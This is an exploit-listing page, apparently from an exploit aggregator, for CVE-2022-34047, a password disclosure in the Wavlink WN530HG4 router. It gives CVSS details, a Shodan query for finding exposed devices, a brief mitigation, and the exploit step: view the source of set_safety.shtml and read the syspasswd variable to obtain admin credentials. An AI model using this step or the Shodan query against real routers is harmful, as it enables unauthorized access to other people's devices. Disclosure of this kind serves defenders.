header-logo
Suggest Exploit
vendor:
WN530HG4
by:
Ahmed Alroky
7.5
CVSS
HIGH
Password Disclosure
200
CWE
Product Name: WN530HG4
Affected Version From: M30HG4.V5030.191116
Affected Version To: M30HG4.V5030.191116
Patch Exists: NO
Related CWE: CVE-2022-34047
CPE: a:wavlink:wn530hg4
Metasploit:
Other Scripts:
Tags: cve2022,wavlink,router,exposure,packetstorm,cve
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://drive.google.com/file/d/1sTQdUc12aZvJRFeb5wp8AfPdUEkkU9Sy/view?usp=sharinghttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34047http://packetstormsecurity.com/files/167891/Wavlink-WN530HG4-Password-Disclosure.htmlhttps://nvd.nist.gov/vuln/detail/CVE-2022-34047
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.title:"Wi-Fi APP Login"', 'verified': True, 'vendor': 'wavlink', 'product': 'wl-wn530hg4_firmware'}
Platforms Tested: Windows
2022

Wavlink WN530HG4 – Password Disclosure

An unauthenticated user can view the source code of the set_safety.shtml page and search for the variable syspasswd to find the username and password.

Mitigation:

Ensure that the set_safety.shtml page is not accessible to unauthenticated users.
Source

Exploit-DB raw data:

# Exploit Title: Wavlink WN530HG4 - Password Disclosure
# Date: 2022-06-12
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: M30HG4.V5030.191116
# Vendor home page : wavlink.com
# Authentication Required: No
# CVE : CVE-2022-34047
# Tested on: Windows

# Exploit

view-source:http://IP_address/set_safety.shtml?r=52300
search for var syspasswd="
you will find the username and the password

Navigation

Suggest Exploit

Services By CQR